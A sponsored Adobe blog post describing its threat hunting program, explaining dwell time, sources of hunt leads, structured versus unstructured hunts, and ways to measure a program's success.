Editor’s note: The following is a sponsored blog post from Adobe.
When many companies think about network security, they usually think in terms of firewalls, anti-virus software, intrusion detection systems, and multi-factor authentication (MFA). Once these preventative measures are in place, companies often centralize their monitoring and response processes by standing up a security operations center (SOC) that responds to alerts, including an incident response (IR) team tasked with mitigating and remediating any detected threats.
As a security organization matures, it can begin to invest resources in more sophisticated proactive security practices, such as threat hunting. At Adobe, that’s exactly what we’ve done, and we’d like to give you an inside look at the threat hunting program within our Security Coordination Center (SCC).
What is threat hunting?
Threat hunting is a “blue team” function that defends the enterprise from malicious activity that might have evaded existing security defences. If you’re familiar with “blue” vs. “red” team terminology in the security space, blue teams are part of a company’s defensive security program while red teams are part of an offensive security program, purposely attacking the enterprise to discover existing vulnerabilities before the real malicious actors can.
The primary goal of a threat hunting program is to decrease the gap between an initial compromise and the discovery of an attack, something that’s called “dwell time.” The longer the bad actor goes undetected in an environment, the longer the dwell time and the longer they have to do damage.
More specifically, threat hunts can find previously undetected issues, including compromised or misconfigured hosts, visibility gaps, and other security risks. They can also help analyze and enhance the effectiveness of your detection mechanisms and processes, as well as provide post-hunt recommendations to improve security. Sometimes, they can discover new threats or tactics, techniques and procedures (TTPs) that lead to an entirely new hunt.
What should you look for?
So now that you know what threat hunting is, how do you know what to look for? Hunt ideas or leads can come from many sources within the organization. A primary source is from your SOC, which likely observes emerging threat patterns during their day-to-day triage. Another source for hunt leads are the TTPs identified by your incident response team. These patterns of behavior can be used to help defend against specific threat vectors and strategies used by malicious actors. While your IR team may be limited to mitigating the incident itself, the threat hunting team can search for behavior with a wider lens to uncover a potentially similar attack.
Other hunt ideas can come from outside your organization. There’s no shortage of external vulnerabilities these days, so it makes sense for your security organization to be vigilant for industry-wide exploitation attempts that leverage those vulnerabilities. Your threat hunting team can be a huge help in this regard. That team can also be tasked with searching for behavior observed in external threat or breach reports issued by security researchers and standards organizations, such as MITRE.
How are hunts structured?
Hunts typically fall into two distinct categories: structured and unstructured. While both use hypotheses to start, threat hunters use structured hunts when they have a specific TTP or behavior in mind from the beginning (such as bad actors using system-native tools like curl or wget on a compromised host, downloading additional malware or hack tools from the internet). Unauthorized access gained by hackers using the recent Log4j vulnerability was likely the subject of hunts at thousands of companies worldwide.
Unstructured hunts, on the other hand, focus on searching for anomalies or outliers in larger data sets and often involve data science techniques or ML/AI. For example, you might observe a change in DNS activity, where a process begins making requests to an unknown domain and decide it warrants further investigation. Alternatively, your threat hunting team might be searching through user activity logs and see an anomaly, such as a service attempting to access resources for which it does not have authorization.
How do you measure success?
Just like other business processes, measuring the success of a threat hunting program can be broken into qualitative and quantitative aspects. On the qualitative side, overlaying your hunts on the MITRE ATT&CK framework, which is the “gold standard” for profiling attackers, can give you an overall idea of how well you’re protecting your company against common attacks. New detection analytics, such as detection rules, and security recommendations that result from hunts also improve the company’s existing detection and prevention capabilities.
Quantitatively, keeping track of the number of incidents, compromised hosts, misconfigurations and the like that your threat hunting program has discovered before damage has been done is a good metric to measure success. Reducing the dwell time of incidents and the completion time for hunts can also help demonstrate the need for and success of your threat hunting program to management. Using analytics software, you can also measure a variety of additional and company-specific metrics and KPIs.
A proactive approach
At Adobe, we’ve built a scalable threat hunting program that provides early detection of potential harm, reduces dwell time for information security incidents, delivers guidance on how to mitigate potential harm to Adobe’s customers, brand, or products, and helps us educate our peers in how to improve at both recognizing and addressing possible threats. By proactively hunting for advanced threats, the hunt team adds an additional layer to Adobe’s defense-in-depth posture and provides constant feedback to help improve our cybersecurity controls.
